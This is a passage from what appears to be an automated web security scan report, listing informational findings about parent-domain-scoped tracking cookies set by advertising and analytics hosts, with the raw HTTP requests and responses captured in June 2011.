Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:25:59 GMT
Server: Jetty(6.1.22)
Content-Length: 42
Cache-Control: no-cache, no-store
content-type: image/gif
P3P: 'policyref="/w3c/policy.xml", CP="DSP NID OTP UNR STP NON"'
X-Powered-By: Mirror Image Internet
Via: 1.1 rhv192176010000 (MII-APC/1.6)
Set-Cookie: ptc=1879%3D728x90-2;Path=/;Domain=.vizu.com;Expires=Wed, 13 Jul 2011 11:25:59 GMT;

GIF89a.............!.......,........@..D.;

12.146. http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://timecom.122.2o7.net
Path:	/b/ss/timecom/1/H.20.2/s79694016552530

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_snjbdhj=[CS]v4|26FAF980051D1E46-4000012A4013F6EF|4DF5F1E9[CE]; Expires=Sat, 11 Jun 2016 11:22:40 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/timecom/1/H.20.2/s79694016552530?AQB=1&ndh=1&t=13/5/2011%206%3A18%3A0%201%20300&pageName=tuned_in%7CGame%20of%20Thrones%20Watch%3A%20The%20Unkindest%20Cut&g=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&cc=USD&ch=time&events=event1%2Cevent32&c6=television&c7=blog&c11=tuned_in&c16=arts%26entertainment&c17=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v23=tuned_in%7CGame%20of%20Thrones%20Watch%3A%20The%20Unkindest%20Cut&v24=arts%26entertainment&c26=2011-06-13%2002%3A56%3A35%7Ctuned_in%7CGame%20of%20Thrones%20Watch%3A%20The%20Unkindest%20Cut&c28=James%20Poniewozik&v32=1&v33=1&v34=1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: timecom.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_snjbdhj=[CS]v4|26FAF980051D1E46-4000012A4013F6EF|4DF5F1E9[CE]; Expires=Sat, 11 Jun 2016 11:22:40 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 12 Jun 2011 11:22:40 GMT
Last-Modified: Tue, 14 Jun 2011 11:22:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF5F300-3C80-7A9149D4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www282
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.147. http://tr.adinterax.com/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tr.adinterax.com
Path:	/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

adxf=715836@1@127.721919@1@131.487338@1@131.766144@1@131.492697@1@138; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=017a594de6e6833c; adxf=715836@1@127.721919@1@131.487338@1@131.766144@1@131

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:11:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=715836@1@127.721919@1@131.487338@1@131.766144@1@131.492697@1@138; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

12.148. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tvfanatic.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VM_USR="AJMPkWzp50e+mCjNOtx/e8kAADsIAAA7XgIAAAEwiL1MrgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Fri, 12-Aug-2011 11:22:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intellitxt/front.asp?ipid=21217 HTTP/1.1
Host: tvfanatic.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR="AJMPkWzp50e+mCjNOtx/e8kAADsIAAA7VAUAAAEwVqToBQA-"

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AJMPkWzp50e+mCjNOtx/e8kAADsIAAA7XgIAAAEwiL1MrgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Fri, 12-Aug-2011 11:22:45 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10864
Date: Mon, 13 Jun 2011 11:22:45 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...

12.149. http://u.openx.net/w/1.0/sc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://u.openx.net
Path:	/w/1.0/sc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; Version=1; Expires=Tue, 12 Jun 2012 11:01:45 GMT; Max-Age=31536000; Domain=.openx.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/sc?r=http%3A%2F%2Fox-d.sbnation.com%2Fw%2F1.0%2Fajs%3Fo%3D700820584%26auid%3D20336%26tid%3D2%2C8%2C17%26res%3D1920x1200x32%26plg%3Dswf%2Csl%2Cshk%26ch%3DUTF-8%26tz%3D300%26c.team%3Ddallas-mavericks%26c.entry_type%3Dstory%26c.region%3Ddallas%26url%3Dhttp%253A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship%26cb%3D700820584%26cc%3D1 HTTP/1.1
Host: u.openx.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1306540055; i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; Version=1; Expires=Tue, 12 Jun 2012 11:01:45 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.7.2 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://ox-d.sbnation.com/w/1.0/ajs?o=700820584&auid=20336&tid=2,8,17&res=1920x1200x32&plg=swf,sl,shk&ch=UTF-8&tz=300&c.team=dallas-mavericks&c.entry_type=story&c.region=dallas&url=http%3A//www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship&cb=700820584&cc=1&mi=5cb31120-2bcf-44f1-b2a9-32c6ee29a288&mn=0&mc=1
Date: Mon, 13 Jun 2011 11:01:45 GMT
Content-Type: text/html
Content-Length: 0
Connection: close

12.150. http://vap3den1.lijit.com/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vap3den1.lijit.com
Path:	/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; expires=Tue, 12-Jun-2012 11:02:43 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?&bannerid=4282&campaignid=573&zoneid=114244&loc=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&rtb_tid=9be0830b-cca2-4ba1-9833-e5e7f6548639&rpid=1&cb=07e7eb845b HTTP/1.1
Host: vap3den1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; tpro_inst=ccc7e60c4d109f2ab6f71d3e2488034a; tpro=eJxNkNtuhSAQRf9lnskJF%2FH2G31sGkIQlUTBgDZpjP9eBmN73mZtZvbs4YQthtEtFvoTJusHG7FaNSr0JWsCo32oqi4Ceiq9QjGOGmUEWIamgMjQKlEhCE5ASFV1ZZSApGpbjoTE0ShqU5yMPgyKXZvNx6j0%2Bvjq5LTPQGB2aXvUsM8YkmYLM7tliNajjQ%2FY0EgCP%2FZeInOH8yasZQ1VgqKcHQRVdal5R6CmitFCAk%2Bhbyk7XBGWxd4n%2B%2BDvb5BvcsaGwBT1oJKZS8b2ynPJ7Rjj8ywV9PCxhbgnyFft0DNBm67mHa%2Bvr7%2BL8rfvDsP%2BvxJYw6BMODwOEfi2MbmQ7wX2onBdv4jRfBQ%3D; ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; expires=Tue, 12-Jun-2012 11:02:43 GMT; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.151. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://viamtv.112.2o7.net
Path:	/b/ss/viamtv/1/H.22.1/s75181884909979

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_pogkrp=[CS]v4|26FAF9D50514A5EA-4000016020003946|4DF5F223[CE]; Expires=Sat, 11 Jun 2016 11:25:30 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s75181884909979?AQB=1&ndh=1&t=13%2F5%2F2011%206%3A18%3A33%201%20300&ce=UTF-8&pageName=BLOGS%2Fmoviesblog%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&g=http%3A%2F%2Fmoviesblog.mtv.com%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&ch=BLOGS&events=event16&h1=BLOGS%2Fmoviesblog%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&h2=BLOGS%2Fmoviesblog%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2Findex&c5=non-member&c6=not%20logged-in&c10=MTV%20Movies%20Blog&c11=game-of-thrones%2C&c12=poll%2Creviews%2Ctv%2C&c20=Josh%20Wigler&c26=MTV%20Movies%20Blog&c33=Monday&c34=6%3A00AM&c41=New&v45=Monday&v46=6%3A00AM&v49=BLOGS&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:25:30 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF9D50514A5EA-4000016020003946|4DF5F223[CE]; Expires=Sat, 11 Jun 2016 11:25:30 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 12 Jun 2011 11:25:30 GMT
Last-Modified: Tue, 14 Jun 2011 11:25:30 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF5F3AA-4BB6-75112571"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www201
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.152. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://viamtv.112.2o7.net
Path:	/b/ss/viamtv/1/H.22.1/s77238202237058

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_pogkrp=[CS]v4|26FAF9D5851634F6-400001A0A0010331|4DF5F223[CE]; Expires=Sat, 11 Jun 2016 11:25:31 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s77238202237058?AQB=1&ndh=1&t=13%2F5%2F2011%206%3A18%3A26%201%20300&ce=UTF-8&pageName=BLOGS%2Fmoviesblog%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&g=http%3A%2F%2Fmoviesblog.mtv.com%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&ch=BLOGS&events=event16&h1=BLOGS%2Fmoviesblog%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&h2=BLOGS%2Fmoviesblog%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2Findex&c5=non-member&c6=not%20logged-in&c10=MTV%20Movies%20Blog&c11=game-of-thrones%2C&c12=poll%2Creviews%2Ctv%2C&c20=Josh%20Wigler&c26=MTV%20Movies%20Blog&c33=Monday&c34=6%3A00AM&c41=New&v45=Monday&v46=6%3A00AM&v49=BLOGS&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:25:31 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF9D5851634F6-400001A0A0010331|4DF5F223[CE]; Expires=Sat, 11 Jun 2016 11:25:31 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 12 Jun 2011 11:25:31 GMT
Last-Modified: Tue, 14 Jun 2011 11:25:31 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF5F3AB-69CB-13791372"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www605
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.153. http://vt.imiclk.com/cgi/vtc.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vt.imiclk.com
Path:	/cgi/vtc.cgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CH=32766,00000,18654,53bro,18661,53bro,24785,53c27,34985,00000,24783,53c27,18653,53bro,33114,00000,37991,00000,36760,00000,32619,00000,38066,00000,19029,58T8w,32620,00000,24775,00000,34986,00000,28363,53br0,22244,53br0,34505,00000,24782,53c27,19037,58T8w,34030,00000,32680,00000,34698,00000,34506,00000,19036,58T8w; domain=.imiclk.com; path=/; expires=Tue, 12-Jun-2012 11:03:29 GMT
RQ=3151,57rv5,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3425,58T8w,1042,58T8w,1182,58T8w,1271,58T8w,1273,58T8w,1286,58T8w,1339,58T8w,1909,58T8w,2170,5DuCE,1211,58T8w,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; domain=.imiclk.com; path=/; expires=Tue, 12-Jun-2012 11:03:29 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/vtc.cgi?m=3&v=v&c=6764587&z=1307962990&g=2258000&l=2960776&cv=0&cm=CPM HTTP/1.1
Host: vt.imiclk.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAgAAAAoAAAAAAP8AAAACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABl1IWa7dI-CjC5RC68xQYCFUS-ABfl6WkI1WroAAAAAA==,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,B%3D10%26Z%3D160x600%26_salt%3D3382701272%26r%3D0%26s%3D1812134,b9573eaa-95ac-11e0-bfb6-1cc1de044292
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CH=32766,00000,18654,53bro,18661,53bro,24785,53c27,24783,53c27,18653,53bro,33114,00000,32619,00000,38066,00000,19029,58T8w,32620,00000,24775,00000,22244,53br0,28363,53br0,19037,58T8w,24782,53c27,32680,00000,19036,58T8w; RQ=3151,57rv5,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,1042,58T8w,1182,58T8w,1271,58T8w,1273,58T8w,1286,58T8w,1339,58T8w,1909,58T8w,1211,58T8w,3425,58T8w,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; YU=9fa0ce56cf0a7fccfc9f70009fb45375-58T8w; OL8U=2-2-B0214141DED1291A4FF0463D9E06444BD5100362C216DF15CC667F2767BC1758-991AD395E12A9826D82DE593D62CFBCFAE28214D0237D0E3F7994E1DF381CB11; AD1=3,1575606,3,2960776,162,CPM,5DtwS

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.63 (CentOS)
